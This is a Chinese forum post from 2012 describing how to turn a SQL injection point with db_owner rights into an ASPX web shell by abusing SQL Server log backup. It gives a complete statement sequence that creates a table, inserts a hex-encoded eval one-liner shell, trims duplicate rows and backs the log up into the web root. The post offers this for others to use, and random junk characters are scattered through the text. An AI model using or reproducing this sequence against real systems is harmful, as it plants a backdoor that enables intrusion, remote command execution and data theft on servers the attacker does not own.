最近在看个网站的时候,aspx的字符型注点,db_owner权限,但是不支持asp,常见的方法是log备份asp,这次我们要备份aspx了(在这只讨论备份)。
. \; \+ @& c9 j d但是直接写一句话虽然可以备份成功,但是执行时会报错,因此直接备份的一句话是无法执行的。
. l; c0 Y5 k* h' T9 u/ Z经过查找资料和本人测试发现,利用ie备份的时候,insert时,向表中插入内容,都是重复插入3条数据(ie6,ie8均如此),因此导致执行时出错;利用查询分析器insert的时候,只插入一条数据,因此不会报错,所以一句话成功执行。$ o T3 y K/ z- `" l9 j: q* w
经测试,备份如下格式:空格一句话空格、<br>一句话<br>时,有一定概率可以成功。不知道是什么原因,特来论坛请教,望高手解惑。# F, A. p( q0 c4 {
- l, W/ s3 [+ `$ M5 P }- U--------------------------------------------------------------" R2 F2 E7 [% P- ]. s( ^( [
今天又试了下,发现直接备份有时候也可以成功,晕死了,为防止备份时插入多条内容导致出错,# m! x! x4 P1 {( b
自己修改备份语句如下:) y' _- X, s& O9 J7 W
Drop table cmd;--
9 |( U4 B6 D8 d% dalter database db_test set RECOVERY FULL;--
y$ |7 e D6 p* h u: N/ }) c$ Qcreate table cmd (a image,id int IDENTITY (1,1)); --添加了个自动编号的字段
* p% o2 ^ B6 M% R/ M9 mbackup log db_test to disk = 'c:\bak' with init;--7 V, l' j; Z& F6 _
insert into cmd (a) values(0x3C25402050616765204C616E67756167653D224A73637269707422253E3C256576616C28526571756573742E4974656D5B227A225D2C22756E7361666522293B253E);--
v* Y/ j& B2 E y) E/ A6 _delete from cmd where id>1;--删除id>1的数据
$ o, e6 V; \+ P# q: a# X( \backup log db_test to disk = 'e:\webroot\test.aspx';--
2 Z' D) T/ w% H7 b+ A7 g4 yDrop table cmd;--
% A) k$ U/ ~0 f* m" h希望对大家有用。 |
发表于 2012-9-5 14:57:25
收藏
支持
反对